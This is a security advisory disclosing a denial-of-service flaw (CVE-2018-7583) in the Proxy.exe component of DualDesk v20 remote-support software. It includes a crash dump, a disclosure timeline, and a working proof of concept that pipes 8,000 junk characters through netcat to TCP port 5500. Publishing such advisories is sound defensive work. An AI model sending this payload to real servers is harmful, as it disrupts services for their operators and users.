85 lines
No EOL
2.4 KiB
Text
85 lines
No EOL
2.4 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
|
|
[+] ISR: Apparition Security
|
|
|
|
|
|
Vendor:
|
|
===============
|
|
www.dualdesk.com
|
|
|
|
|
|
|
|
Product:
|
|
===========
|
|
DualDesk v20
|
|
|
|
DualDesk is powerful, easy to use remote support software that is a one-time purchase and lets your
|
|
technical support staff remote assist a PC anywhere on the internet through firewalls in seconds with no
|
|
configuration.
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Denial Of Service
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2018-7583
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
Remote unauthenticated attackers can crash the "Proxy.exe" Server component of Dualdesk application
|
|
which listens on TCP Port 5500 by sending a long string of junk chars.
|
|
|
|
(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
|
|
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
|
|
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0 nv up ei pl zr na pe nc
|
|
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
|
|
ntdll!NtWaitForMultipleObjects+0x15:
|
|
77c6016d 83c404 add esp,4
|
|
|
|
|
|
Exploit/POC:
|
|
=============
|
|
Start the Dualdesk Run Proxy as Application.
|
|
|
|
C:\>python -c "print 'a'*8000" > crash.txt
|
|
|
|
C:\>type crash.txt | nc.exe localhost 5500
|
|
|
|
Crash!!!
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Medium
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: February 4, 2018
|
|
Second attempt : February 17, 2018
|
|
Request CVE, assigned by Mitre : March 1, 2018
|
|
March 1, 2018 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c). |